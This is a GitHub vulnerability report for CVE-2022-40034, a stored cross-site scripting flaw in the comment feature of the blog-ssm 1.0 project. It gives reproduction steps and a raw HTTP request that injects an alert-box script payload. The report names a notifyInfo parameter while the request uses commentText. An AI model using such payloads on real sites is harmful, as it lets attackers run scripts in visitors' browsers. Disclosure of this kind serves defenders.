CVE-2022-40034: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') In /comment · Issue #4 · rawchen/blog-ssm

Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) In /comment****[Suggested description]

blog-ssm v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /comment. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the notifyInfo parameter.

[Vulnerability Type]

Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

[Vendor of Product]

https://github.com/rawchen/blog-ssm

[Affected Product Code Base]

1.0

[Affected Component]

blog-ssm 1.0

OS: Windows/Linux/macOS

Browser: Chrome、Firefox、Safari

[Attack Vector]****Step1:Registered account, username: text123, password: 123456.

Step2:Log in to the account you just registered and click "File Management".

Step3:Click any article on the homepage and enter malicious Javascript code in the comment area.

Data Pack:

POST /comment HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 72 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/articles/blog-ssm Cookie: JSESSIONID=F68B6E11EB57F40C26C413029E832793 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1

contentId=65&commentText=%3Cscript%3Ealert%28%22123%22%29%3C%2Fscript%3E

Step4:Visit the article again to trigger a stored XSS attack.

[Attack Type]

Remote

[Impact Code execution]

True

[Reference(s)]

https://cwe.mitre.org/data/definitions/79.html